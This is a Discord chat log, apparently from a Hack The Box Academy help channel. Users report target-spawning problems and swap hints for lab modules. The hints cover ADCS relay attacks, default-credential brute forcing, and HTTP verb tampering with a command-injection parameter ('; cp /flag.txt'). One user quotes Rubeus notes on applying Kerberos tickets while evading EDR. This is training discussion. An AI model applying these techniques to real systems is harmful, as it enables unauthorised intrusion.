Nevermind got it!

eu academy ones are not

thanks !

can't ping the target lol

doesn't work for me either

us 3 looks fine

The spawning works for me after about five tries on average

hello there , is spawning not working ?

I havent been able to get any of the academy machines to spawn on the AD modules either. It just hangs at 'Target is spawning'.

Pinned message: "We are aware of problems regarding spawning/connecting to targets.

Our team is investigating this and we will provide updates/further information when it becomes known."

Is there going to be anything done with the weekly streaks on HTBA? It feels kind of like really random feature.

Oh and crazy you guys are still having trouble connecting. I had a bit of troubles day before yesterday and seen a lot of people post about this problem on Reddit. I was able to get the machines to spawn after reloading the page and letting it sit on spawning for a while.

i restarted it like 4 or 5 times

Look at the pinned message

look at the context of my message

nvm didnt see, sry

yeah np

Anyone able to give me a hand with active directory skills assement 2 getting flag from desktop on sql01

In Academy, I seem to be able to spawn hosts fine, but having connected with xrdp it is very flaky and keeps disconnecting with 'network disconnect' error - is this likely related to the on-going issues?

https://www.hackthebox.com/blog/academy-streaks

TL;DR We are currently working on rewards that studious hackers will benefit from. We are still in beta, but building out the rewards structure is on the list!

I had a streak of almost 600 days on tryhackme but for some reason it didn't count me one day. I always wait a week for their emails, so I wrote on their discord on the support channel "check the logs". I got banned because moderator decided that "it's not tryhackme related" xD please tell me that if something goes wrong on htb academy, you won't ban me for no reason, I don't want to be hurt a second time

congrats on the 600 days streak

I'm working on DNS section of Footprinting module in HTB Academy. There is a (fourth) question in the section relating to finding certain FQDN for a host ending with .203. I enumerated the service based on the advice in the section and utilized all wordlists available. No joy. Can somebody give me a hint?

that's a bit unusual, also it happened to me once (i think my streak was 400+) but as long as you are being respectful on their discord and ask nicely through their support email they could restore your streak

at least for me

getting banned for unrelated topics is tough. You'll have 2 people telling you to read #welcome and say wrong thread tho. But i haven't seen anyone getting banend for that. Maybe for serious rule break, but hard to confirm

Find all DNS Zones

i believe this one may require a tool as well; but the section refers to this tool

I don't understand the difference between tehnical and non technical notes.

I just have notes, that I take while I'm reading the module...

well, the tool does not recognize that, despite the fact that all (on the pwnbox) wordlists were used.

subdomains of a subdomain

a.b.inlanefreight.htb

ok, that's the issue ...

you need to find all the hosts

non-technical: "This shit's fucked"
technical: "Due to a misconfiguration of a service/privileges, shit's fucked"

haha, but how can I take non tech notes from the module?

Run some commands to do shit?

non-technical is just another way to say, informal

do you do that marcie? separate notes into tech and non tech?

aka you understand it, but others might not

i don't really, but that's also because I come from having tech support experience

so I'm used to taking notes on a process

makes sense

is blocked because of many connection errors; unblock with 'mysqladmin flush-hosts' someone know how to solve this ?

imo its more "high level" then informal, no?

Intro to Bash Scripting module -> Arguments, Variables, and Arrays section, the output below isnt correct I think, it would be permission denied

non-technical at least to me means that it's not using technical jargon/phrasing to convey things.
"System is not powering on" would be non-technical
"System not powering on due to No POST" would be technical.
it just depends on the degrees and type of details.
A technical documentation would be able to retrace steps to be able to recreate the steps, non-technical will be more vague and likely have more gaps in understanding/making assumptions of the reader

i had to take mostly technical notes as all documentation was taken as legal documentation as well, in case a customer needed/wanted to escalate w/e issue they were having to legal

in the technical notes; we were not allowed to use swear words - we had to censor them if we are quoting the customer verbatim

Can anyone give a hint on the ADCS Attack Skills Assessment? I can't find any way to compromise host 'DEV01' or user 'J*'. I have tried all the attacks in the module but none of them pass. ESC8 and ESC11, which are displayed in the module, require the group rights that 'J*' has. And for the other attacks the user has no rights. I also know that user 'T**' is in the VPN_Users group and has enroll permissions on it, but can't do anything.

esc8/11 does not require any particular right,s you're targeting and coercing the machine account for an authentication

||Wow, I saw your review on this module, what a coincidence that you are here haha||
I've tried multiple times and can't get a certificate, all I get are request id's that I can't approve

Moreover I tried this on all active certificates but it did not give any result

you know that you need to target dev01, and you know where the CA is, so try coerce and relay

@civic dawn : don't DM me without asking permission

Is that a thing, lol, I just get message requests once very two days.

Also, I think i did message you without requesting, I don't remember. I apologize if I did hehe

I ignore anyone that sends a friend request out of the blue tho. I get about 4 per week lol

I generally ignore

if you chat here frequently you'll get lots of those

I'm a bit curious why not just disable dm's from server members?

gotcha.

@fathom pendant can I send you a hi on dm?

Doing the formal process lmao

I don't mind, I'm ok with helping when I can, and I can't stay on modules since I can't help with 80% of problems here. So i just stick with the dms and people who post on cdsa

since you asked: no

🤷‍♂️ i dunno it just seems odd to me.

if i disable it and want to offer help, i then have to add the person as a friend, which I don't want to do

just extra steps to the process if it's disabled

I guess the reason why im confused is if they need help then they should be asking here

I'll try again later lmao.

Oh, can I send a POST request to your discord's address lol... I'll send that later when I remember. (ignore for now)

that's true. For cdsa tho I understand, there's much less support for cdsa here

You'd think that's the case

but also there's times where it's completely unrelated

¯_(ツ)_/¯

Thank you for your service/help to the community @fathom pendant

hi, trying to get back into my course after a few months break for 1 reason or another, struggling with password attacks module.

anyone able to give me a hint/nudge in right direction

on the password reuse/default passwords module, i can ssh fine (using credentials i got on the step before)

i am guessing that the mysql password is some alternative variation of the same root word as the ssh password (if its not then i feel the module is very misleading) and i have a wordlist with a bunch of those options. im not too sure which username but i have been trying root along with a few of the previous names from this module but no luck so far

i have also found an encrypted zip file which i have so far failed to break into and not sure if that is relevant to the task or not

i feel like ive struggled a lot with these bruteforcing tasks in general, i never feel like i know what lists to use and then i end up either not getting a hit or it takes hours and then still doesnt give a hit 😦

it is not; there's a default cred cheatsheet

i did try default mysql creds too but they didnt seem to work

there's a handful of them and one definitely will work; note you have to be signed in as the user to access the mysql db

so ssh as sam then do a check for the mysql creds

can i get any help on this, i am in the verge of losing it

ok im in but i have never heard of that mysql user and cant find any reference to it on google. thanks for help though

the section gives you a mysql cheatsheet

what section

the sequence is ssh as sam -> mysql -u <user> -p

what i have tried so far
curl -i -X [all 9 verbs] url?file; cp /flag.txt ./(encoded)
used burp,with all 9 verbs too
tried using a verb and then use get request without the injection to check

Bypassing security filters, web attacks

have you tried through burp suite?

HTTP verb tampering sub section

yes

can i see the request?

ye thats how i found it, but i had been looking through mysql docs and stackoverflow for mysql default password and there are a few options but none of them had worked 😦

i guess the lesson is to fully explore all the links in the info rather than trying to use my previous knowledge + official docs of the apps involved

the cheatsheet is a compilation of old and new defaults; plus known defaults that people have used in the past

reminder: this module is about password attacks - so no need to get crazy with trying huge lists. This is where paying attention to what your reading helps 100x more than just trying to get through it for the sake of it

also: save creds you find

i get that part, thats why i felt like once i was pushing hydra config past a few hundred variations i was going wrong, i just felt like i had enough experience with mysql that i had covered the default creds and so it felt like it was going to be the password reuse side rather than the defaults, ofc now i realise i was wrong there and i will try to remember this tool in future even for applications i feel like i know

that’s not how the options method works

right click -> change request method

and send it again

Am I the only one having issues spawning my target's, lately it sometimes takes 5 or 6 refreshes as "Target is spawning" stays the status for 20+ minutes, and I refresh and it prompts me to spawn target again... Wasting 2 or 3 hours every day to get a Target spawned is not my idea of a good time.

try changing vpn regions

only done 2 so far today but both spawned pretty fast

Hi, may I DM you with the this problem too? I stuck and dont know the missing or wrong parameter.

why is that, rubeus can do it without admin rights?

Thanks finally worked on my 3rd different region

extract from the rubeus github

With the Mimikatz approach, administrative rights are needed as you are manipulating LSASS memory directly. As previously mentioned, Mimikatz' popularity has also led to this type of behavior (opening up a handle to LSASS and reading/writing its memory) being a big target for EDR detection and/or prevention. With the Rubeus/Kekeo approach, administrative rights are not needed as LSASS is not being touched. However, if the ticket is applied to the current logon session (with /ptt), the TGT for the current logon session will be overwritten. This behavior can be avoided (with administrative access) by using the /createnetonly command to create a sacrificial process/logon session, then using /ptt /ticket:X /luid:0xa.. with the newly created process LUID. If using Cobalt Strike, using the make_token command with dummy credentials and then kerberos_ticket_use with the ticket retrieved by Rubeus will let you apply the new TGT in a way that a) doesn't need administrative rights and b) doesn't stomp on the current logon session TGT.

thank you

theres a few paragraphs about what exactly it means about 'LSASS not being touched' just above it

sure

dang target spawns but cant ping, its unreachable :/

what do i do now with my free time xD

cry

i dont

do a module that doesn't have targets?

Go touch grass?

is web cache poisoning from abusing http misconfiguration module still feasible ??

nah have seen enough from the RL today, was working and then buying a car for GF xD

but the part with modules without target is a good idea

it's not likely

web cache would be more for intranet type stuff, so it's feasible but on a wide-scale/public not likely

sorry, i mean, during the module when i try to poison the web cache, it seems that the "admin" is not visiting the the website 🙂

do you guys prefer mimikatz or rubeus? or do you use both

should be

guys, still can't spawn the target system on pivoting tunnelling and port forwarding room...

I don't know what I can do

just be patient

it seems these issues have been intermittent

it's like an hour that shows target is spawning

i was facing the same issue yesterday, maybe take a break and come back later

When I try to spawn target I get this error: You don't have enough permissions to create a genesis.

that sounds like an issue on https://app.hackthebox.com ?

I'm using enterprise hackthebox but yesterday it was working

ah then you should probably message support

Genesis is an Enterprise Prolab from what i know

(which isn't a lot)

I've contacted support thanks

You practically live here. You know a hell of a lot and you share your knowledge here. I really appreciate that

now if only i could summon the motivation to finish cpts path

the AD enum module zaps the life out of me whenever i do even a section

Rough topic or rough module writing?

it's just the mental toll

like my brain understanding it takes a lot

thats whenever i have to deal with windows

if you need help, just ping me

but that's just a process of how i learn. I strive to break down the given commands and it works

It's just a lot of mental energy

Gotcha. That's fair. AD is a lot.

but I can understand the individual portions of commands at least

(also funny that sometimes PowerView and ActiveDirectory powershell modules conflict)

so... i got curious. Great work

a lot of it is foundational knowledge and learning about internal pentesting mindsets which is different than external stuff.

tough now but will make future similar topics way easier to grasp

light work

tbf thats all of the sever

you have a similar number lol 39k

I think it's fair to say you've helped thousands of people, even if counting all server

its 21k for modules

¯_(ツ)_/¯

@fathom pendant charging 1$ for each help lmao

Marcie probably could charge for CPTS tutoring

I'd have to complete it first

I think any takers would be dumb for relying on outside help, but Marcie would def earn money lul

could be helpful on explaining the material tho

it is funny though when i guide people to the answer they were already staring at

Maybe Marcie will soon become a trainer for CPTS courses
https://cyberhelmets.com/etn/certified-penetration-testing-specialist/

#recruit marcie

i think it was last night or something

going back a step every time new progress was made with A getting-started section

can't talk too much shit bc i've been there

but it is funny

going back to "getting started" module? I just glanced through it and it seems like a summary of the path, pretty awesome.

marcie are you a Discord AI bot? u are always here, do you even sleep?

eexaactly, it's rare to jump here and not find marcie... Maybe they're a highly advanced AI made by HTB in secret

yeah it consumed all 46k messages and impersonates marcie perfectly

someone had a question about the privesc section of the module

Marcie lives here.

https://tenor.com/view/hes-in-the-walls-in-the-walls-wall-muppet-panicking-gif-27546618

oh gotcha, I'll get to it between this week and next. Looking forward to it, looks like an amazing module

What's up with the walls joke?

my school ran a blue team competition. and red team was saying they were in the walls all the time

the entire module, as you can guess, is VERY basic. Exactly what it says on the tin

this is starting to feel like bullying 😦

In the walls is a cheeky way of saying "I'm watching everything you do"

as if i know things that i'd have to be in the same room as you to know

yeah its just a pop culture idiom

just cos some of us failed the first question you dont have to tell everyone

never said i was referring to you?

yup, no clue who they're talking about

referencing cases where people had intruders living inside their homes without their knowledge. Literally hiding in the attics and walls and stealing food when the home owners went to sleep

I don't believe in @ anyone unless they absolutely deserve it or I know they can take the joke if i'm poking fun

that's freaking wild

tapeworm mentality 😄

🪱

did you know some homes have hidden razors in the walls? super crunchy

so 'Im in your walls' is meant to be an evocative and creepy way of Im watching you by being closer than youd think possible

which is very appropriate in red vs blue team context lul

cause red team can absolutely be inside the blue teams metaphorical walls

lol, the red team discord was going wild with that lmao

Red team was in all boxes hehe

https://tenor.com/view/ahead-of-you-gif-18442352

always red

I love how iconic that line is but mario actually loses in the video

even though itself is just a reference to one of the greatest technical youtube videos ever

gotta step it up

it's a beefy 12 layer burrito of a joke

omg u a chatbot

since 2019 huh, so that's 5 years, awesome

165 in modules smh

smh, learn from marcie lmao